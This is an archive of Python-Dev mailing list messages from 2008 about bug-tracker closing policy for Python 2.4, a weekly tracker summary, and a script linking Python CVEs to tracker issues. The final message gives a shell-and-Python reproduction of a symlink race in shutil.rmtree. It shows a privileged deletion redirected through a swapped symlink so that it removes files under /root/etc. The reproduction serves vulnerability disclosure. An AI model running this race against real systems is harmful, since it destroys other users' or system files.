Re: [Python-Dev] Summary of Python tracker Issues
>> Correct. > > If a bug exists and is fixed in a later release -- I would call it 'out > of date' instead. Hmm. You have a point, but it should be "Fixed" then, and we have indeed closed bug reports as "fixed" if later releases fixed the bug. It probably doesn't really matter - if the complaint was specifically that the bug is in 2.4.x, with a request to fix it in 2.4.x+1, then it's "won't fix". Regards, Martin ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Summary of Python tracker Issues
Martin v. Löwis wrote: Jeremy Hylton wrote: I wanted to ask a policy question on the bug tracker. What are we doing with bugs filed against Python 2.4? This bug http://bugs.python.org/issue1208304 reports a fd leak in Python 2.4, which doesn't exist in the head. Since Python 2.4 is in security-fix only mode, is it fair to close this with a won't fix? Correct. If a bug exists and is fixed in a later release -- I would call it 'out of date' instead. ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Summary of Python tracker Issues
Jeremy Hylton wrote: > I wanted to ask a policy question on the bug tracker. What are we > doing with bugs filed against Python 2.4? > This bug http://bugs.python.org/issue1208304 reports a fd leak in > Python 2.4, which doesn't exist in the head. Since Python 2.4 is in > security-fix only mode, is it fair to close this with a won't fix? Correct. Regards, Martin ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] CVE tracking
On Mon, Nov 24, 2008 at 10:43, Mart Somermaa <[EMAIL PROTECTED]> wrote: >> When I looked through that list a week or so ago, I noticed that some >> issues were obviously related to the Python distribution itself, but others >> were appeared to be Python application problems. > > I looked through the list now and weeded out irrelevant CVEs (by putting > them into > the ignore list in the script). > Also, now the output has descriptions of the CVEs as well, so it's more > readable. > > Improved output: http://dpaste.com/hold/93386/ > Improved script (with a proper IGNORED_LIST): http://dpaste.com/hold/93388/ > > The results are much better: > 5 OK's, 8 WARNings, 7 ERRORs. > > Most of the errors are from 2007 or before, the only error from 2008 is an > obscure Tools/faqwiz/move-faqwiz.sh-related one. > Thanks for doing this, Mart! But I know that at least for me I won't be able to look at the list until some time after 3.0 is released. And I suspect I am not the only member of the PSRT that this will be true for. If anyone wants to toss this list up on the wiki and go through to help figure out what is needed for each (and either update the CVE as needed or file an issue on the bug tracker mentioning the CVE; bonus if you fix it as well) that would be helpful. -Brett ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
[Python-Dev] CVE tracking
When I looked through that list a week or so ago, I noticed that some issues were obviously related to the Python distribution itself, but others were appeared to be Python application problems. I looked through the list now and weeded out irrelevant CVEs (by putting them into the ignore list in the script). Also, now the output has descriptions of the CVEs as well, so it's more readable. Improved output: http://dpaste.com/hold/93386/ Improved script (with a proper IGNORED_LIST): http://dpaste.com/hold/93388/ The results are much better: 5 OK's, 8 WARNings, 7 ERRORs. Most of the errors are from 2007 or before, the only error from 2008 is an obscure Tools/faqwiz/move-faqwiz.sh-related one. ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Summary of Python tracker Issues
On Mon, Nov 24, 2008 at 10:02, Jeremy Hylton <[EMAIL PROTECTED]> wrote: > On Mon, Nov 24, 2008 at 12:54 PM, Brett Cannon <[EMAIL PROTECTED]> wrote: >> On Mon, Nov 24, 2008 at 08:58, Jeremy Hylton <[EMAIL PROTECTED]> wrote: >>> I wanted to ask a policy question on the bug tracker. What are we >>> doing with bugs filed against Python 2.4? >>> This bug http://bugs.python.org/issue1208304 reports a fd leak in >>> Python 2.4, which doesn't exist in the head. Since Python 2.4 is in >>> security-fix only mode, is it fair to close this with a won't fix? >>> >> >> I think so. >> >>> A meta-question: Is there a document that has any tips on how to >>> handle bug reports? It might be helpful to have a list of hints or >>> policy decisions to help people decide what to do with bugs. >> >> It's coming. I just have not gotten around to it yet. I plan to >> outline the basic steps in the life of an issue and that includes >> closing an issue and the various reasons this can happen. > > If you put up skeleton doc, I can add a note to this effect. > The doc I have for it is made up like five bullet points, so nothing to really put up yet. But I did add another bullet point for this. -Brett > Jeremy > >> >> -Brett >> >> >>> >>> Jeremy >>> >>> On Fri, Nov 21, 2008 at 12:06 PM, Python tracker <[EMAIL PROTECTED]> wrote: ACTIVITY SUMMARY (11/14/08 - 11/21/08) Python tracker at http://bugs.python.org/ To view or respond to any of the issues listed below, click on the issue number. Do NOT respond to this message. 2194 open (+35) / 14007 closed (+18) / 16201 total (+53) Open issues with patches: 728 Average duration of open issues: 712 days. Median duration of open issues: 2043 days. Open Issues Breakdown open 2177 (+35) pending17 ( +0) Issues Created Or Reopened (56) ___ Tkinter binding involving Control-spacebar raises unicode error 11/18/08 http://bugs.python.org/issue1028reopened ocean-city patch Byte/string inconsistencies between different dbm modules11/21/08 http://bugs.python.org/issue3799reopened brett.cannon patch, needs review type of UserList instance returns class instead of instance 11/14/08 CLOSED http://bugs.python.org/issue4326created chafporte Patch: simplify complex constant assignment statements 11/14/08 http://bugs.python.org/issue4327created novalis_dt patch "à" in u"foo" raises a misleading error 11/15/08 http://bugs.python.org/issue4328created ezio.melotti base64 does not properly handle unicode strings 11/15/08 http://bugs.python.org/issue4329created mbecker wsgiref.validate doesn't accept arguments to readline11/16/08 CLOSED http://bugs.python.org/issue4330created ianb Can't use _functools.partial() created function as method11/16/08 http://bugs.python.org/issue4331created ssadler asyncore.file_dispatcher does not use dup()'ed fd11/17/08 CLOSED http://bugs.python.org/issue4332created christianbecke patch Reworked Dialog.py 11/17/08 http://bugs.python.org/issue4333created gpolo patch Mac Build Script is broken for 2.6 release 11/17/08 CLOSED http://bugs.python.org/issue4334created ngift inspect.getsourcelines ignores last line in module 11/17/08 http://bugs.python.org/issue4335created RafeSacks Fix performance issues in xmlrpclib 11/17/08 http://bugs.python.org/issue4336created krisvale patch, patch, easy Iteration over a map object with list() 11/17/08 CLOSED http://bugs.python.org/issue4337created jmfauth TypeError (bytes/str) in distutils command "upload" 11/17/08 CLOSED http://bugs.python.org/issue4338created hagen patch Fix set-like dictview doc11/17/08 CLOSED http://bugs.python.org/issue4339created tjreedy xmlrpc.client - default 'SlowParser' not defined 11/17/08 http://bugs.python.org/issue4340created mwatkins Update __hash__ doc 11/17/08 CLOSED http://bugs.python.org/issue4341created tjreedy (Tkinter) Please backport these 11/18/08 http://bugs.python.org/issue4342created gpolo New function in
Re: [Python-Dev] Summary of Python tracker Issues
On Mon, Nov 24, 2008 at 12:54 PM, Brett Cannon <[EMAIL PROTECTED]> wrote: > On Mon, Nov 24, 2008 at 08:58, Jeremy Hylton <[EMAIL PROTECTED]> wrote: >> I wanted to ask a policy question on the bug tracker. What are we >> doing with bugs filed against Python 2.4? >> This bug http://bugs.python.org/issue1208304 reports a fd leak in >> Python 2.4, which doesn't exist in the head. Since Python 2.4 is in >> security-fix only mode, is it fair to close this with a won't fix? >> > > I think so. > >> A meta-question: Is there a document that has any tips on how to >> handle bug reports? It might be helpful to have a list of hints or >> policy decisions to help people decide what to do with bugs. > > It's coming. I just have not gotten around to it yet. I plan to > outline the basic steps in the life of an issue and that includes > closing an issue and the various reasons this can happen. If you put up skeleton doc, I can add a note to this effect. Jeremy > > -Brett > > >> >> Jeremy >> >> On Fri, Nov 21, 2008 at 12:06 PM, Python tracker <[EMAIL PROTECTED]> wrote: >>> >>> ACTIVITY SUMMARY (11/14/08 - 11/21/08) >>> Python tracker at http://bugs.python.org/ >>> >>> To view or respond to any of the issues listed below, click on the issue >>> number. Do NOT respond to this message. >>> >>> >>> 2194 open (+35) / 14007 closed (+18) / 16201 total (+53) >>> >>> Open issues with patches: 728 >>> >>> Average duration of open issues: 712 days. >>> Median duration of open issues: 2043 days. >>> >>> Open Issues Breakdown >>> open 2177 (+35) >>> pending17 ( +0) >>> >>> Issues Created Or Reopened (56) >>> ___ >>> >>> Tkinter binding involving Control-spacebar raises unicode error 11/18/08 >>> http://bugs.python.org/issue1028reopened ocean-city >>> patch >>> >>> Byte/string inconsistencies between different dbm modules11/21/08 >>> http://bugs.python.org/issue3799reopened brett.cannon >>> patch, needs review >>> >>> type of UserList instance returns class instead of instance 11/14/08 >>> CLOSED http://bugs.python.org/issue4326created chafporte >>> >>> >>> Patch: simplify complex constant assignment statements 11/14/08 >>> http://bugs.python.org/issue4327created novalis_dt >>> patch >>> >>> "à" in u"foo" raises a misleading error 11/15/08 >>> http://bugs.python.org/issue4328created ezio.melotti >>> >>> >>> base64 does not properly handle unicode strings 11/15/08 >>> http://bugs.python.org/issue4329created mbecker >>> >>> >>> wsgiref.validate doesn't accept arguments to readline11/16/08 >>> CLOSED http://bugs.python.org/issue4330created ianb >>> >>> >>> Can't use _functools.partial() created function as method11/16/08 >>> http://bugs.python.org/issue4331created ssadler >>> >>> >>> asyncore.file_dispatcher does not use dup()'ed fd11/17/08 >>> CLOSED http://bugs.python.org/issue4332created christianbecke >>> patch >>> >>> Reworked Dialog.py 11/17/08 >>> http://bugs.python.org/issue4333created gpolo >>> patch >>> >>> Mac Build Script is broken for 2.6 release 11/17/08 >>> CLOSED http://bugs.python.org/issue4334created ngift >>> >>> >>> inspect.getsourcelines ignores last line in module 11/17/08 >>> http://bugs.python.org/issue4335created RafeSacks >>> >>> >>> Fix performance issues in xmlrpclib 11/17/08 >>> http://bugs.python.org/issue4336created krisvale >>> patch, patch, easy >>> >>> Iteration over a map object with list() 11/17/08 >>> CLOSED http://bugs.python.org/issue4337created jmfauth >>> >>> >>> TypeError (bytes/str) in distutils command "upload" 11/17/08 >>> CLOSED http://bugs.python.org/issue4338created hagen >>> patch >>> >>> Fix set-like dictview doc11/17/08 >>> CLOSED http://bugs.python.org/issue4339created tjreedy >>> >>> >>> xmlrpc.client - default 'SlowParser' not defined 11/17/08 >>> http://bugs.python.org/issue4340created mwatkins >>> >>> >>> Update __hash__ doc 11/17/08 >>> CLOSED http://bugs.python.org/issue4341created tjreedy >>> >>> >>> (Tkinter) Please backport these 11/18/08 >>> http://bugs.python.org/issue4342created gpolo >>> >>> >>> New function in Tkinter.py: setup_master 11/18/08 >>> http://bugs.python.org/issue4343created gpolo >>> patch >>> >>> crash upon launch11/18/08 >>> CLOSED http://bugs.python.org/issue4344created source.mod >>> >>> >>> Implement nb_nonzero for PyTclObject
Re: [Python-Dev] Summary of Python tracker Issues
On Mon, Nov 24, 2008 at 08:58, Jeremy Hylton <[EMAIL PROTECTED]> wrote: > I wanted to ask a policy question on the bug tracker. What are we > doing with bugs filed against Python 2.4? > This bug http://bugs.python.org/issue1208304 reports a fd leak in > Python 2.4, which doesn't exist in the head. Since Python 2.4 is in > security-fix only mode, is it fair to close this with a won't fix? > I think so. > A meta-question: Is there a document that has any tips on how to > handle bug reports? It might be helpful to have a list of hints or > policy decisions to help people decide what to do with bugs. It's coming. I just have not gotten around to it yet. I plan to outline the basic steps in the life of an issue and that includes closing an issue and the various reasons this can happen. -Brett > > Jeremy > > On Fri, Nov 21, 2008 at 12:06 PM, Python tracker <[EMAIL PROTECTED]> wrote: >> >> ACTIVITY SUMMARY (11/14/08 - 11/21/08) >> Python tracker at http://bugs.python.org/ >> >> To view or respond to any of the issues listed below, click on the issue >> number. Do NOT respond to this message. >> >> >> 2194 open (+35) / 14007 closed (+18) / 16201 total (+53) >> >> Open issues with patches: 728 >> >> Average duration of open issues: 712 days. >> Median duration of open issues: 2043 days. >> >> Open Issues Breakdown >> open 2177 (+35) >> pending17 ( +0) >> >> Issues Created Or Reopened (56) >> ___ >> >> Tkinter binding involving Control-spacebar raises unicode error 11/18/08 >> http://bugs.python.org/issue1028reopened ocean-city >> patch >> >> Byte/string inconsistencies between different dbm modules11/21/08 >> http://bugs.python.org/issue3799reopened brett.cannon >> patch, needs review >> >> type of UserList instance returns class instead of instance 11/14/08 >> CLOSED http://bugs.python.org/issue4326created chafporte >> >> >> Patch: simplify complex constant assignment statements 11/14/08 >> http://bugs.python.org/issue4327created novalis_dt >> patch >> >> "à" in u"foo" raises a misleading error 11/15/08 >> http://bugs.python.org/issue4328created ezio.melotti >> >> >> base64 does not properly handle unicode strings 11/15/08 >> http://bugs.python.org/issue4329created mbecker >> >> >> wsgiref.validate doesn't accept arguments to readline11/16/08 >> CLOSED http://bugs.python.org/issue4330created ianb >> >> >> Can't use _functools.partial() created function as method11/16/08 >> http://bugs.python.org/issue4331created ssadler >> >> >> asyncore.file_dispatcher does not use dup()'ed fd11/17/08 >> CLOSED http://bugs.python.org/issue4332created christianbecke >> patch >> >> Reworked Dialog.py 11/17/08 >> http://bugs.python.org/issue4333created gpolo >> patch >> >> Mac Build Script is broken for 2.6 release 11/17/08 >> CLOSED http://bugs.python.org/issue4334created ngift >> >> >> inspect.getsourcelines ignores last line in module 11/17/08 >> http://bugs.python.org/issue4335created RafeSacks >> >> >> Fix performance issues in xmlrpclib 11/17/08 >> http://bugs.python.org/issue4336created krisvale >> patch, patch, easy >> >> Iteration over a map object with list() 11/17/08 >> CLOSED http://bugs.python.org/issue4337created jmfauth >> >> >> TypeError (bytes/str) in distutils command "upload" 11/17/08 >> CLOSED http://bugs.python.org/issue4338created hagen >> patch >> >> Fix set-like dictview doc11/17/08 >> CLOSED http://bugs.python.org/issue4339created tjreedy >> >> >> xmlrpc.client - default 'SlowParser' not defined 11/17/08 >> http://bugs.python.org/issue4340created mwatkins >> >> >> Update __hash__ doc 11/17/08 >> CLOSED http://bugs.python.org/issue4341created tjreedy >> >> >> (Tkinter) Please backport these 11/18/08 >> http://bugs.python.org/issue4342created gpolo >> >> >> New function in Tkinter.py: setup_master 11/18/08 >> http://bugs.python.org/issue4343created gpolo >> patch >> >> crash upon launch11/18/08 >> CLOSED http://bugs.python.org/issue4344created source.mod >> >> >> Implement nb_nonzero for PyTclObject 11/18/08 >> http://bugs.python.org/issue4345created gpolo >> patch >> >> PyObject_CallMethod changes the exception message already set by 11/18/08 >> http://bugs.python.org/issue4346created gpolo >> patch >> >> Dependencies of graminit.h ar
Re: [Python-Dev] Summary of Python tracker Issues
I wanted to ask a policy question on the bug tracker. What are we doing with bugs filed against Python 2.4? This bug http://bugs.python.org/issue1208304 reports a fd leak in Python 2.4, which doesn't exist in the head. Since Python 2.4 is in security-fix only mode, is it fair to close this with a won't fix? A meta-question: Is there a document that has any tips on how to handle bug reports? It might be helpful to have a list of hints or policy decisions to help people decide what to do with bugs. Jeremy On Fri, Nov 21, 2008 at 12:06 PM, Python tracker <[EMAIL PROTECTED]> wrote: > > ACTIVITY SUMMARY (11/14/08 - 11/21/08) > Python tracker at http://bugs.python.org/ > > To view or respond to any of the issues listed below, click on the issue > number. Do NOT respond to this message. > > > 2194 open (+35) / 14007 closed (+18) / 16201 total (+53) > > Open issues with patches: 728 > > Average duration of open issues: 712 days. > Median duration of open issues: 2043 days. > > Open Issues Breakdown > open 2177 (+35) > pending17 ( +0) > > Issues Created Or Reopened (56) > ___ > > Tkinter binding involving Control-spacebar raises unicode error 11/18/08 > http://bugs.python.org/issue1028reopened ocean-city > patch > > Byte/string inconsistencies between different dbm modules11/21/08 > http://bugs.python.org/issue3799reopened brett.cannon > patch, needs review > > type of UserList instance returns class instead of instance 11/14/08 > CLOSED http://bugs.python.org/issue4326created chafporte > > > Patch: simplify complex constant assignment statements 11/14/08 > http://bugs.python.org/issue4327created novalis_dt > patch > > "à" in u"foo" raises a misleading error 11/15/08 > http://bugs.python.org/issue4328created ezio.melotti > > > base64 does not properly handle unicode strings 11/15/08 > http://bugs.python.org/issue4329created mbecker > > > wsgiref.validate doesn't accept arguments to readline11/16/08 > CLOSED http://bugs.python.org/issue4330created ianb > > > Can't use _functools.partial() created function as method11/16/08 > http://bugs.python.org/issue4331created ssadler > > > asyncore.file_dispatcher does not use dup()'ed fd11/17/08 > CLOSED http://bugs.python.org/issue4332created christianbecke > patch > > Reworked Dialog.py 11/17/08 > http://bugs.python.org/issue4333created gpolo > patch > > Mac Build Script is broken for 2.6 release 11/17/08 > CLOSED http://bugs.python.org/issue4334created ngift > > > inspect.getsourcelines ignores last line in module 11/17/08 > http://bugs.python.org/issue4335created RafeSacks > > > Fix performance issues in xmlrpclib 11/17/08 > http://bugs.python.org/issue4336created krisvale > patch, patch, easy > > Iteration over a map object with list() 11/17/08 > CLOSED http://bugs.python.org/issue4337created jmfauth > > > TypeError (bytes/str) in distutils command "upload" 11/17/08 > CLOSED http://bugs.python.org/issue4338created hagen > patch > > Fix set-like dictview doc11/17/08 > CLOSED http://bugs.python.org/issue4339created tjreedy > > > xmlrpc.client - default 'SlowParser' not defined 11/17/08 > http://bugs.python.org/issue4340created mwatkins > > > Update __hash__ doc 11/17/08 > CLOSED http://bugs.python.org/issue4341created tjreedy > > > (Tkinter) Please backport these 11/18/08 > http://bugs.python.org/issue4342created gpolo > > > New function in Tkinter.py: setup_master 11/18/08 > http://bugs.python.org/issue4343created gpolo > patch > > crash upon launch11/18/08 > CLOSED http://bugs.python.org/issue4344created source.mod > > > Implement nb_nonzero for PyTclObject 11/18/08 > http://bugs.python.org/issue4345created gpolo > patch > > PyObject_CallMethod changes the exception message already set by 11/18/08 > http://bugs.python.org/issue4346created gpolo > patch > > Dependencies of graminit.h are not rebuilt when the file is rege 11/18/08 > http://bugs.python.org/issue4347created thomas.lee > patch > > bytearray methods returning self 11/18/08 > CLOSED http://bugs.python.org/issue4348created DinoV > patch, needs review > > sys.path includes extraneous junk11/18/08 > CLOSED http://bugs.python.org/issue4349created ex
Re: [Python-Dev] CVE tracking
Mart Somermaa wrote: I created a script that parses the http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=python Python-related CVE list and classifies the CVEs as follows: * "ok" -- CVE has references to bugs.python.org * "warnings" -- CVE has references to Python SVN revisions or an issue in bugs.python.org refers to it (i.e. the probelm is probably fixed, but the CVE should really be updated to link to the issue that is probably listed in bugs.python.org) * "errors" -- CVE does have no references to Python issues or SVN nor does any issue in bugs.python.org have references to the CVE id The script is at http://dpaste.com/hold/92930/ The results are at http://dpaste.com/hold/92929/ There were 35 errors, 8 warnings, 5 CVEs were OK. In an ideal world, the references would be symmetric, i.e. every Python-related CVE would have references to one or more issues in bugs.python.org and these issues would also refer back to the CVE id. When I looked through that list a week or so ago, I noticed that some issues were obviously related to the Python distribution itself, but others were appeared to be Python application problems. It is not an 'error' for the latter to have no reference to or from bugs.python.org. I suspect human perusal is need to make the determination. ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
[Python-Dev] CVE tracking
I created a script that parses the
http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=python
Python-related CVE list and classifies the CVEs as follows:
* "ok" -- CVE has references to bugs.python.org
* "warnings" -- CVE has references to Python SVN revisions
or an issue in bugs.python.org refers to it (i.e. the probelm is
probably fixed, but the CVE should really be updated to link
to the issue that is probably listed in bugs.python.org)
* "errors" -- CVE does have no references to Python issues or SVN
nor does any issue in bugs.python.org have references to the CVE id
The script is at http://dpaste.com/hold/92930/
The results are at http://dpaste.com/hold/92929/
There were 35 errors, 8 warnings, 5 CVEs were OK.
In an ideal world, the references would be symmetric, i.e. every
Python-related CVE would have references to one or more issues in
bugs.python.org and these issues would also refer back to the CVE id.
###
As for the rmtree problem that Gisle Aas raised, this seems to apply
as of Python 2.6:
---
# emulate removing /etc
$ sudo cp -a /etc /root/etc/
$ sudo python2.6
>>> for i in xrange(0, 5):
... with open("/root/etc/" + str(i), "w") as f:
... f.write("0")
...
$ ls /root/etc > orig_list.txt
$ mkdir /tmp/attack
$ cp -a /root/etc/* /tmp/attack
$ sudo python2.6
>>> from shutil import rmtree
>>> rmtree('/tmp/attack')
>>> # press ctrl-z to suspend execution
^Z
[1]+ Stopped sudo python2.6
$ mv /tmp/attack /tmp/dummy; ln -s /root/etc /tmp/attack
$ fg
sudo python2.6
Traceback (most recent call last):
File "", line 1, in
File "/usr/local/lib/python2.6/shutil.py", line 225, in rmtree
onerror(os.rmdir, path, sys.exc_info())
File "/usr/local/lib/python2.6/shutil.py", line 223, in rmtree
os.rmdir(path)
OSError: [Errno 20] Not a directory: '/tmp/attack'
$ ls /root/etc > new_list.txt
$ diff -q orig_list.txt new_list.txt
Files orig_list.txt and new_list.txt differ
---
If the attack weren't possible, the lists would not differ.
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe:
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
